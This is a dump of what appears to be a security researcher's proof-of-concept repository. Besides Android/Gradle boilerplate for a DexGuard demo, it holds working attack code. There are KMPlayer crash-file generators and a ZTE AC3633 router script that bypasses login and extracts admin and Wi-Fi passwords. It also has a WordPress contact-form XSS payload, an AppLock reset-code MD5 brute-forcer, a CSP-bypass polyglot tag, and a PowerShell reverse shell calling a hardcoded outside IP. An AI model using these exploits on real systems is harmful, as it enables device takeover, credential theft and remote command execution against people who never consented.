6 |         android:orderInCategory="100" app:showAsAction="never" />
7 | </menu>
8 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/values-w820dp/dimens.xml:
--------------------------------------------------------------------------------
1 | <resources>
2 |     <!-- Example customization of dimensions originally defined in res/values/dimens.xml
3 |          (such as screen margins) for screens with more than 820dp of available width. This
4 |          would include 7" and 10" devices in landscape (~960dp and ~1280dp respectively). -->
5 |     <dimen name="activity_horizontal_margin">64dp</dimen>
6 | </resources>
7 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/values/dimens.xml:
--------------------------------------------------------------------------------
1 | <resources>
2 |     <!-- Default screen margins, per the Android Design guidelines. -->
3 |     <dimen name="activity_horizontal_margin">16dp</dimen>
4 |     <dimen name="activity_vertical_margin">16dp</dimen>
5 | </resources>
6 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/values/strings.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <resources>
 3 | 
 4 |     <string name="app_name">DexReverseDemo</string>
 5 |     <string name="hello_world">Hello world!</string>
 6 |     <string name="action_settings">Settings</string>
 7 |     <string name="title_activity_secret">Secret</string>
 8 | 
 9 | </resources>
10 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/values/styles.xml:
--------------------------------------------------------------------------------
1 | <resources>
2 | 
3 |     <!-- Base application theme. -->
4 |     <style name="AppTheme" parent="Theme.AppCompat.Light.DarkActionBar">
5 |         <!-- Customize your theme here. -->
6 |     </style>
7 | 
8 | </resources>
9 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/build.gradle:
--------------------------------------------------------------------------------
 1 | // Top-level build file where you can add configuration options common to all sub-projects/modules.
 2 | 
 3 | buildscript {
 4 |     repositories {
 5 |         jcenter()
 6 |     }
 7 |     dependencies {
 8 |         classpath 'com.android.tools.build:gradle:1.0.0'
 9 | 
10 |         // NOTE: Do not place your application dependencies here; they belong
11 |         // in the individual module build.gradle files
12 |     }
13 | }
14 | 
15 | allprojects {
16 |     repositories {
17 |         jcenter()
18 |     }
19 | }
20 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/gradle.properties:
--------------------------------------------------------------------------------
 1 | # Project-wide Gradle settings.
 2 | 
 3 | # IDE (e.g. Android Studio) users:
 4 | # Gradle settings configured through the IDE *will override*
 5 | # any settings specified in this file.
 6 | 
 7 | # For more details on how to configure your build environment visit
 8 | # http://www.gradle.org/docs/current/userguide/build_environment.html
 9 | 
10 | # Specifies the JVM arguments used for the daemon process.
11 | # The setting is particularly useful for tweaking memory settings.
12 | # Default value: -Xmx10248m -XX:MaxPermSize=256m
13 | # org.gradle.jvmargs=-Xmx2048m -XX:MaxPermSize=512m -XX:+HeapDumpOnOutOfMemoryError -Dfile.encoding=UTF-8
14 | 
15 | # When configured, Gradle will run in incubating parallel mode.
16 | # This option should only be used with decoupled projects. More details, visit
17 | # http://www.gradle.org/docs/current/userguide/multi_project_builds.html#sec:decoupled_projects
18 | # org.gradle.parallel=true


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/gradle/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/gradle/.DS_Store


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/gradle/wrapper/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/gradle/wrapper/.DS_Store


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/gradle/wrapper/gradle-wrapper.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/gradle/wrapper/gradle-wrapper.jar


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/gradle/wrapper/gradle-wrapper.properties:
--------------------------------------------------------------------------------
1 | #Wed Apr 10 15:27:10 PDT 2013
2 | distributionBase=GRADLE_USER_HOME
3 | distributionPath=wrapper/dists
4 | zipStoreBase=GRADLE_USER_HOME
5 | zipStorePath=wrapper/dists
6 | distributionUrl=https\://services.gradle.org/distributions/gradle-2.2.1-all.zip
7 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/gradlew:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env bash
  2 | 
  3 | ##############################################################################
  4 | ##
  5 | ##  Gradle start up script for UN*X
  6 | ##
  7 | ##############################################################################
  8 | 
  9 | # Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
 10 | DEFAULT_JVM_OPTS=""
 11 | 
 12 | APP_NAME="Gradle"
 13 | APP_BASE_NAME=`basename "$0"`
 14 | 
 15 | # Use the maximum available, or set MAX_FD != -1 to use that value.
 16 | MAX_FD="maximum"
 17 | 
 18 | warn ( ) {
 19 |     echo "$*"
 20 | }
 21 | 
 22 | die ( ) {
 23 |     echo
 24 |     echo "$*"
 25 |     echo
 26 |     exit 1
 27 | }
 28 | 
 29 | # OS specific support (must be 'true' or 'false').
 30 | cygwin=false
 31 | msys=false
 32 | darwin=false
 33 | case "`uname`" in
 34 |   CYGWIN* )
 35 |     cygwin=true
 36 |     ;;
 37 |   Darwin* )
 38 |     darwin=true
 39 |     ;;
 40 |   MINGW* )
 41 |     msys=true
 42 |     ;;
 43 | esac
 44 | 
 45 | # For Cygwin, ensure paths are in UNIX format before anything is touched.
 46 | if $cygwin ; then
 47 |     [ -n "$JAVA_HOME" ] && JAVA_HOME=`cygpath --unix "$JAVA_HOME"`
 48 | fi
 49 | 
 50 | # Attempt to set APP_HOME
 51 | # Resolve links: $0 may be a link
 52 | PRG="$0"
 53 | # Need this for relative symlinks.
 54 | while [ -h "$PRG" ] ; do
 55 |     ls=`ls -ld "$PRG"`
 56 |     link=`expr "$ls" : '.*-> \(.*\)$'`
 57 |     if expr "$link" : '/.*' > /dev/null; then
 58 |         PRG="$link"
 59 |     else
 60 |         PRG=`dirname "$PRG"`"/$link"
 61 |     fi
 62 | done
 63 | SAVED="`pwd`"
 64 | cd "`dirname \"$PRG\"`/" >&-
 65 | APP_HOME="`pwd -P`"
 66 | cd "$SAVED" >&-
 67 | 
 68 | CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar
 69 | 
 70 | # Determine the Java command to use to start the JVM.
 71 | if [ -n "$JAVA_HOME" ] ; then
 72 |     if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
 73 |         # IBM's JDK on AIX uses strange locations for the executables
 74 |         JAVACMD="$JAVA_HOME/jre/sh/java"
 75 |     else
 76 |         JAVACMD="$JAVA_HOME/bin/java"
 77 |     fi
 78 |     if [ ! -x "$JAVACMD" ] ; then
 79 |         die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME
 80 | 
 81 | Please set the JAVA_HOME variable in your environment to match the
 82 | location of your Java installation."
 83 |     fi
 84 | else
 85 |     JAVACMD="java"
 86 |     which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.
 87 | 
 88 | Please set the JAVA_HOME variable in your environment to match the
 89 | location of your Java installation."
 90 | fi
 91 | 
 92 | # Increase the maximum file descriptors if we can.
 93 | if [ "$cygwin" = "false" -a "$darwin" = "false" ] ; then
 94 |     MAX_FD_LIMIT=`ulimit -H -n`
 95 |     if [ $? -eq 0 ] ; then
 96 |         if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then
 97 |             MAX_FD="$MAX_FD_LIMIT"
 98 |         fi
 99 |         ulimit -n $MAX_FD
100 |         if [ $? -ne 0 ] ; then
101 |             warn "Could not set maximum file descriptor limit: $MAX_FD"
102 |         fi
103 |     else
104 |         warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT"
105 |     fi
106 | fi
107 | 
108 | # For Darwin, add options to specify how the application appears in the dock
109 | if $darwin; then
110 |     GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\""
111 | fi
112 | 
113 | # For Cygwin, switch paths to Windows format before running java
114 | if $cygwin ; then
115 |     APP_HOME=`cygpath --path --mixed "$APP_HOME"`
116 |     CLASSPATH=`cygpath --path --mixed "$CLASSPATH"`
117 | 
118 |     # We build the pattern for arguments to be converted via cygpath
119 |     ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null`
120 |     SEP=""
121 |     for dir in $ROOTDIRSRAW ; do
122 |         ROOTDIRS="$ROOTDIRS$SEP$dir"
123 |         SEP="|"
124 |     done
125 |     OURCYGPATTERN="(^($ROOTDIRS))"
126 |     # Add a user-defined pattern to the cygpath arguments
127 |     if [ "$GRADLE_CYGPATTERN" != "" ] ; then
128 |         OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)"
129 |     fi
130 |     # Now convert the arguments - kludge to limit ourselves to /bin/sh
131 |     i=0
132 |     for arg in "$@" ; do
133 |         CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -`
134 |         CHECK2=`echo "$arg"|egrep -c "^-"`                                 ### Determine if an option
135 | 
136 |         if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then                    ### Added a condition
137 |             eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"`
138 |         else
139 |             eval `echo args$i`="\"$arg\""
140 |         fi
141 |         i=$((i+1))
142 |     done
143 |     case $i in
144 |         (0) set -- ;;
145 |         (1) set -- "$args0" ;;
146 |         (2) set -- "$args0" "$args1" ;;
147 |         (3) set -- "$args0" "$args1" "$args2" ;;
148 |         (4) set -- "$args0" "$args1" "$args2" "$args3" ;;
149 |         (5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;;
150 |         (6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;;
151 |         (7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;;
152 |         (8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;;
153 |         (9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;;
154 |     esac
155 | fi
156 | 
157 | # Split up the JVM_OPTS And GRADLE_OPTS values into an array, following the shell quoting and substitution rules
158 | function splitJvmOpts() {
159 |     JVM_OPTS=("$@")
160 | }
161 | eval splitJvmOpts $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS
162 | JVM_OPTS[${#JVM_OPTS[*]}]="-Dorg.gradle.appname=$APP_BASE_NAME"
163 | 
164 | exec "$JAVACMD" "${JVM_OPTS[@]}" -classpath "$CLASSPATH" org.gradle.wrapper.GradleWrapperMain "$@"
165 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/gradlew.bat:
--------------------------------------------------------------------------------
 1 | @if "%DEBUG%" == "" @echo off
 2 | @rem ##########################################################################
 3 | @rem
 4 | @rem  Gradle startup script for Windows
 5 | @rem
 6 | @rem ##########################################################################
 7 | 
 8 | @rem Set local scope for the variables with windows NT shell
 9 | if "%OS%"=="Windows_NT" setlocal
10 | 
11 | @rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
12 | set DEFAULT_JVM_OPTS=
13 | 
14 | set DIRNAME=%~dp0
15 | if "%DIRNAME%" == "" set DIRNAME=.
16 | set APP_BASE_NAME=%~n0
17 | set APP_HOME=%DIRNAME%
18 | 
19 | @rem Find java.exe
20 | if defined JAVA_HOME goto findJavaFromJavaHome
21 | 
22 | set JAVA_EXE=java.exe
23 | %JAVA_EXE% -version >NUL 2>&1
24 | if "%ERRORLEVEL%" == "0" goto init
25 | 
26 | echo.
27 | echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.
28 | echo.
29 | echo Please set the JAVA_HOME variable in your environment to match the
30 | echo location of your Java installation.
31 | 
32 | goto fail
33 | 
34 | :findJavaFromJavaHome
35 | set JAVA_HOME=%JAVA_HOME:"=%
36 | set JAVA_EXE=%JAVA_HOME%/bin/java.exe
37 | 
38 | if exist "%JAVA_EXE%" goto init
39 | 
40 | echo.
41 | echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME%
42 | echo.
43 | echo Please set the JAVA_HOME variable in your environment to match the
44 | echo location of your Java installation.
45 | 
46 | goto fail
47 | 
48 | :init
49 | @rem Get command-line arguments, handling Windowz variants
50 | 
51 | if not "%OS%" == "Windows_NT" goto win9xME_args
52 | if "%@eval[2+2]" == "4" goto 4NT_args
53 | 
54 | :win9xME_args
55 | @rem Slurp the command line arguments.
56 | set CMD_LINE_ARGS=
57 | set _SKIP=2
58 | 
59 | :win9xME_args_slurp
60 | if "x%~1" == "x" goto execute
61 | 
62 | set CMD_LINE_ARGS=%*
63 | goto execute
64 | 
65 | :4NT_args
66 | @rem Get arguments from the 4NT Shell from JP Software
67 | set CMD_LINE_ARGS=%$
68 | 
69 | :execute
70 | @rem Setup the command line
71 | 
72 | set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar
73 | 
74 | @rem Execute Gradle
75 | "%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS%
76 | 
77 | :end
78 | @rem End local scope for the variables with windows NT shell
79 | if "%ERRORLEVEL%"=="0" goto mainEnd
80 | 
81 | :fail
82 | rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of
83 | rem the _cmd.exe /c_ return code!
84 | if  not "" == "%GRADLE_EXIT_CONSOLE%" exit 1
85 | exit /b 1
86 | 
87 | :mainEnd
88 | if "%OS%"=="Windows_NT" endlocal
89 | 
90 | :omega
91 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/local.properties:
--------------------------------------------------------------------------------
 1 | ## This file is automatically generated by Android Studio.
 2 | # Do not modify this file -- YOUR CHANGES WILL BE ERASED!
 3 | #
 4 | # This file should *NOT* be checked into Version Control Systems,
 5 | # as it contains information specific to your local configuration.
 6 | #
 7 | # Location of the SDK. This is only used by Gradle.
 8 | # For customization when using a Version Control System, please read the
 9 | # header note.
10 | sdk.dir=/Users/aabraham/Library/Android/sdk


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/settings.gradle:
--------------------------------------------------------------------------------
1 | include ':app'
2 | 


--------------------------------------------------------------------------------
/KMPlayer 3.7.0.109 Integer division by zero DoS.py:
--------------------------------------------------------------------------------
 1 | #KMPlayer 3.7.0.109 Integer division by zero DoS.  
 2 | #Author: Ajin Abraham - xboz  
 3 | #http://opensecurity.in
 4 | 
 5 | header = ("\x52\x49\x46\x46\x64\x31\x10\x00\x57\x41\x56\x45\x66\x6d\x74\x20"  
 6 | "\x10\x00\x00\x00\x01\x00\x01\x00\x22\x56\x00\x00\x10\xb1\x02\x00"  
 7 | "\x04\x00\x00\x00\x64\x61\x74\x61\x40\x31\x10\x00\x14\x00\x2a\x00"  
 8 | "\x1a\x00\x30\x00\x26\x00\x39\x00\x35\x00\x3c\x00\x4a\x00\x3a\x00"  
 9 | "\x5a\x00\x2f\x00\x67\x00\x0a")  
10 | exploit = header  
11 | exploit += "\x41" * 800000  
12 | try:
13 |   print "[+] Creating POC"  
14 |   crash = open('fuzz.wav','w');  
15 |   crash.write(exploit);  
16 |   crash.close();  
17 | except:
18 |   print "[-] No Permissions.."  
19 | 


--------------------------------------------------------------------------------
/KMPlayer 3.9.1.130 Integer division by zero DoS.py:
--------------------------------------------------------------------------------
 1 | # Exploit Title: KMPlayer 3.9.1.130 Integer division by zero DoS.
 2 | # Date: 25-11-2014
 3 | # Author: Ajin Abraham
 4 | # Website: http://opensecurity.in
 5 | # Vendor Homepage: http://www.kmpmedia.net/
 6 | # Software Link: http://filehippo.com/download_kmplayer/download/7f497da5a4cda4032bf7e4a11c9e3131/
 7 | # Version: 3.9.1.130
 8 | # Tested on: Windows 7,8, 8.1
 9 | 
10 | header = ("\x52\x49\x46\x46\x64\x31\x10\x00\x57\x41\x56\x45\x66\x6d\x74\x20"
11 | "\x10\x00\x00\x00\x01\x00\x01\x00\x22\x56\x00\x00\x10\xb1\x02\x00"
12 | "\x04\x00\x00\x00\x64\x61\x74\x61\x40\x31\x10\x00\x14\x00\x2a\x00"
13 | "\x1a\x00\x30\x00\x26\x00\x39\x00\x35\x00\x3c\x00\x4a\x00\x3a\x00"
14 | "\x5a\x00\x2f\x00\x67\x00\x0a")
15 | exploit = header
16 | exploit += "\x41" * 800000
17 |  
18 | try:
19 |     print "[+] Creating POC"
20 |     crash = open('fuzz.wav','w');
21 |     crash.write(exploit);
22 |     crash.close();
23 | except:
24 |     print "[-] No Permissions.."
25 | 


--------------------------------------------------------------------------------
/MTS MBlaze Ultra Wi-Fi_ZTE AC3633 Exploit.py:
--------------------------------------------------------------------------------
 1 | #Author: Ajin Abraham - xboz
 2 | #http://opensecurity.in
 3 | #Product MTS MBlaze 3G Wi-Fi Modem
 4 | #System Version 107
 5 | #Manufacturer ZTE
 6 | #Model 	AC3633
 7 | import requests
 8 | import os
 9 | import urllib2
10 | print "MTS MBlaze Ultra Wi-Fi / ZTE AC3633 Exploit"
11 | print "Vulnerabilities"
12 | print "Login Bypass | Router Credential Stealing | Wi-Fi Password Stealing | CSRF | Reset Password without old password and Session\n"
13 | url='http://192.168.1.1'
14 | def find_between( s, first, last ):
15 |     try:
16 |         start = s.index( first ) + len( first )
17 |         end = s.index( last, start )
18 |         return s[start:end]
19 |     except ValueError:
20 |         return ""
21 | #Vulnerable Static Cookies
22 | cookies = dict(iusername='logined')
23 | #Login Bypass
24 | login_url = url+'/en/index.asp'
25 | print "\nAttempting Login :"+url
26 | print '================='
27 | try:
28 |     response=urllib2.urlopen(url,timeout=1)
29 | except:
30 |     print "Cannot Reach : "+url
31 |     exit
32 | r = requests.get(login_url, cookies=cookies)
33 | print 'Status : ' + str(r.status_code)
34 | if "3g.asp" in r.text:
35 |      print "Login Sucessfull!"
36 | #Information Gathering
37 | print "\nInformation"
38 | print "========="
39 | info_url=url+'/en/3g.asp'
40 | i= requests.get(info_url, cookies=cookies)
41 | ip=find_between(i.text,'"g3_ip" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','"></td>')
42 | subnet =find_between(i.text,'"g3_mask" disabled="disabled" style="background:#ccc;"  size="16" maxlength="15" value="','"></td>')
43 | gateway=find_between(i.text,'"g3_gw" disabled="disabled" style="background:#ccc;"  size="16" maxlength="15" value="','"></td>')
44 | print "IP : " +ip
45 | print "Subnet : "+subnet
46 | print "Gateway : " +gateway
47 | #Steal Login Password
48 | print "\nStealing Router Login Credentials"
49 | print "======================"
50 | login_pwd_url=url+'/en/password.asp'
51 | p = requests.get(login_pwd_url, cookies=cookies)
52 | print 'Status : ' + str(p.status_code)
53 | print 'Username :  admin' #default
54 | passwd=find_between(p.text,'id="sys_password" value="','"/>')
55 | print 'Password : '+ passwd
56 | print '\nExtracting WPA/WPA2 PSK Key'
57 | print '================='
58 | #Wi-Fi Password Extraction
59 | wifi_pass_url=url+'/en/wifi_security.asp'
60 | s = requests.get(wifi_pass_url, cookies=cookies)
61 | print 'Status: ' + str(s.status_code)
62 | wpa=find_between(s.text,"wpa_psk_key]').val('","');")
63 | wep=find_between(s.text,"wep_key]').val('","');")
64 | print "WPA/WPA2 PSK : " + wpa
65 | print "WEP Key : " + wep
66 | 
67 | print "\nOther Vulnerabilities"
68 | print "======================="
69 | print "\n1.Cross Site Request Forgery in:\n\nhttp://192.168.1.1/en/dhcp_reservation.asp\nhttp://192.168.1.1/en/mac_filter.asp \nhttp://192.168.1.1/en/password.asp"
70 | print "\n2.Password Reset without old password and Session"
71 | print """
72 | POST /goform/formSyWebCfg HTTP/1.1
73 | Host: 192.168.1.1
74 | Content-Type: application/x-www-form-urlencoded
75 | Referer: http://192.168.1.1/en/password.asp
76 | Accept-Encoding: gzip,deflate,sdch
77 | Accept-Language: en-US,en;q=0.8,es;q=0.6,ms;q=0.4
78 | Content-Length: 52
79 | 
80 | action=Apply&sys_cfg=changed&sys_password=mblazetestpassword
81 | """
82 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | PoC
2 | ===
3 | 
4 | Proof of Concepts, Exploits
5 | 


--------------------------------------------------------------------------------
/WordPress Clean And Simple Contact Form 4.4.0 XSS:
--------------------------------------------------------------------------------
 1 | Author : Ajin Abraham
 2 | Author Website: http://opensecurity.in
 3 | 
 4 | Affected Product: WordPress Clean and Simple Contact Form
 5 | Affected Version:  <= 4.4.0
 6 | Vendor: Meg Nicholas
 7 | Vendor URL:
 8 | http://www.pluginmirror.com/plugins/clean-and-simple-contact-form-by-meg-nicholas/
 9 | WP Plugin URL:
10 | https://wordpress.org/plugins/clean-and-simple-contact-form-by-meg-nicholas/
11 | 
12 | PoC:
13 | 
14 | Make a POST request to the page containing the contact form generated by
15 | "Clean and Simple Contact Form"
16 | with the POST DATA as cscf[name]=" onfocus=alert(1) autofocus x="
17 | 
18 | POST http://localhost/contact-us/
19 | cscf[name]=" onfocus=alert(1) autofocus x="
20 | 


--------------------------------------------------------------------------------
/applock md5 bruteforce.go:
--------------------------------------------------------------------------------
  1 | package main
  2 | 
  3 | import (
  4 |     "bufio"
  5 |     "fmt"
  6 |     "os"
  7 |     "crypto/md5"
  8 | 	"math/rand"
  9 | 	"regexp"
 10 | 	"strconv"
 11 | 	"strings"
 12 | 	"encoding/hex"
 13 | 	"time"
 14 | 
 15 | )
 16 | 
 17 | 
 18 | const (
 19 | 	Alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
 20 | 	Numerals = "0123456789"
 21 | 	Ascii    = Alphabet + Numerals //+ "~!@#$%^&*()-_+={}[]\\|<,>.?/\"';:`"
 22 | )
 23 |  
 24 | type GeneratorExprRanges [][]byte
 25 |  
 26 | func seedAndReturnRandom(n int) int {
 27 | 	return rand.Intn(n)
 28 | }
 29 |  
 30 | func alphabetSlice(from, to byte) (string, error) {
 31 | 	leftPos := strings.Index(Ascii, string(from))
 32 | 	rightPos := strings.LastIndex(Ascii, string(to))
 33 | 	if leftPos > rightPos {
 34 | 		return "", fmt.Errorf("Invalid range specified: %s-%s", string(from), string(to))
 35 | 	}
 36 | 	return Ascii[leftPos:rightPos], nil
 37 | }
 38 |  
 39 | func replaceWithGenerated(s *string, expresion string, ranges [][]byte, length int) error {
 40 | 	var alphabet string
 41 | 	for _, r := range ranges {
 42 | 		switch string(r[0]) + string(r[1]) {
 43 | 		case `\w`:
 44 | 			alphabet += Ascii
 45 | 		case `\d`:
 46 | 			alphabet += Numerals
 47 | 		default:
 48 | 			if slice, err := alphabetSlice(r[0], r[1]); err != nil {
 49 | 				return err
 50 | 			} else {
 51 | 				alphabet += slice
 52 | 			}
 53 | 		}
 54 | 	}
 55 | 	if len(alphabet) == 0 {
 56 | 		return fmt.Errorf("Empty range in expresion: %s", expresion)
 57 | 	}
 58 | 	result := make([]byte, length, length)
 59 | 	for i := 0; i <= length-1; i++ {
 60 | 		result[i] = alphabet[seedAndReturnRandom(len(alphabet))]
 61 | 	}
 62 | 	*s = strings.Replace(*s, expresion, string(result), 1)
 63 | 	return nil
 64 | }
 65 |  
 66 | func findExpresionPos(s string) GeneratorExprRanges {
 67 | 	rangeExp, _ := regexp.Compile(`([\\]?[a-zA-Z0-9]\-?[a-zA-Z0-9]?)`)
 68 | 	matches := rangeExp.FindAllStringIndex(s, -1)
 69 | 	result := make(GeneratorExprRanges, len(matches), len(matches))
 70 | 	for i, r := range matches {
 71 | 		result[i] = []byte{s[r[0]], s[r[1]-1]}
 72 | 	}
 73 | 	return result
 74 | }
 75 |  
 76 | func rangesAndLength(s string) (string, int, error) {
 77 | 	expr := s[0:strings.LastIndex(s, "{")]
 78 | 	length, err := parseLength(s)
 79 | 	return expr, length, err
 80 | }
 81 |  
 82 | func parseLength(s string) (int, error) {
 83 | 	lengthStr := string(s[strings.LastIndex(s, "{")+1 : len(s)-1])
 84 | 	if l, err := strconv.Atoi(lengthStr); err != nil {
 85 | 		return 0, fmt.Errorf("Unable to parse length from %v", s)
 86 | 	} else {
 87 | 		return l, nil
 88 | 	}
 89 | }
 90 |  
 91 | func Generate(template string) (string, error) {
 92 | 	result := template
 93 | 	generatorsExp, _ := regexp.Compile(`\[([a-zA-Z0-9\-\\]+)\](\{([0-9]+)\})`)
 94 | 	matches := generatorsExp.FindAllStringIndex(template, -1)
 95 | 	for _, r := range matches {
 96 | 		ranges, length, err := rangesAndLength(template[r[0]:r[1]])
 97 | 		if err != nil {
 98 | 			return "", err
 99 | 		}
100 | 		positions := findExpresionPos(ranges)
101 | 		if err := replaceWithGenerated(&result, template[r[0]:r[1]], positions, length); err != nil {
102 | 			return "", err
103 | 		}
104 | 	}
105 | 	return result, nil
106 | }
107 | 
108 | 
109 | func main(){
110 | 	fmt.Println("MD5 Reset Code Bruteforcer for AppLock\nLength of Reset code is of 8 Char and contains only alpha numerics.\n")
111 | 	reader := bufio.NewReader(os.Stdin)
112 |     fmt.Print("Enter MD5: ")
113 |     md5hash, _ := reader.ReadString('\n')
114 |     md5hash = strings.ToLower(md5hash)
115 |     fmt.Println("Cracking the MD5: ",md5hash)
116 |   
117 |     for{
118 |     	result, _ := Generate(`[a-z0-9]{8}`)
119 |         data := []byte(result)
120 |     	x:=md5.Sum(data)
121 |     	hash:=hex.EncodeToString(x[:])
122 |     	fmt.Println(time.Now().UTC(), " Generated Code : ", result," MD5: ", hash)
123 | 		cmp:=hash == md5hash
124 | 		if cmp == true {
125 | 			fmt.Print("\n\n")
126 | 			fmt.Println(time.Now().UTC(), " Reset Code Cracked!")
127 | 			fmt.Println(time.Now().UTC(), " Reset Code: ", result, " MD5 Match: ", hash )
128 | 			break
129 | 		}
130 | 		}
131 | 
132 |     
133 | 	
134 | }
135 | 


--------------------------------------------------------------------------------
/csp.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/csp.gif


--------------------------------------------------------------------------------
/github_revoke_this_please.env:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/polyglot.html:
--------------------------------------------------------------------------------
1 | <script src="https://cdn.jsdelivr.net/gh/ajinabraham/PoC/csp.gif"></script>
2 | 


--------------------------------------------------------------------------------
/reverse_shell.ps1:
--------------------------------------------------------------------------------
 1 |     try 
 2 |       {
 3 |         $client = New-Object System.Net.Sockets.TCPClient("52.33.204.74",1337)
 4 |         $stream = $client.GetStream()
 5 |         [byte[]]$bytes = 0..65535|%{0}
 6 | 
 7 |         #Send back current username and computername
 8 |         $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
 9 |         $stream.Write($sendbytes,0,$sendbytes.Length)
10 | 
11 |         #Show an interactive PowerShell prompt
12 |         $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
13 |         $stream.Write($sendbytes,0,$sendbytes.Length)
14 | 
15 |         while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
16 |         {
17 |             $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
18 |             $data = $EncodedText.GetString($bytes,0, $i)
19 |             try
20 |             {
21 |                 #Execute the command on the target.
22 |                 $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
23 |             }
24 |             catch
25 |             {
26 |                 Write-Warning "Something went wrong with execution of command on the target." 
27 |                 Write-Error $_
28 |             }
29 |             $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
30 |             $x = ($error[0] | Out-String)
31 |             $error.clear()
32 |             $sendback2 = $sendback2 + $x
33 | 
34 |             #Return the results
35 |             $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
36 |             $stream.Write($sendbyte,0,$sendbyte.Length)
37 |             $stream.Flush()  
38 |         }
39 |         $client.Close()
40 |         if ($listener)
41 |         {
42 |             $listener.Stop()
43 |         }
44 |     }
45 |     catch
46 |     {
47 |         Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." 
48 |         Write-Error $_
49 |     }
50 | 


--------------------------------------------------------------------------------
/script.js:
--------------------------------------------------------------------------------
1 | alert("Hey I am from GitHub");
2 | 
3 | 


--------------------------------------------------------------------------------
/terminal-poc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/terminal-poc


--------------------------------------------------------------------------------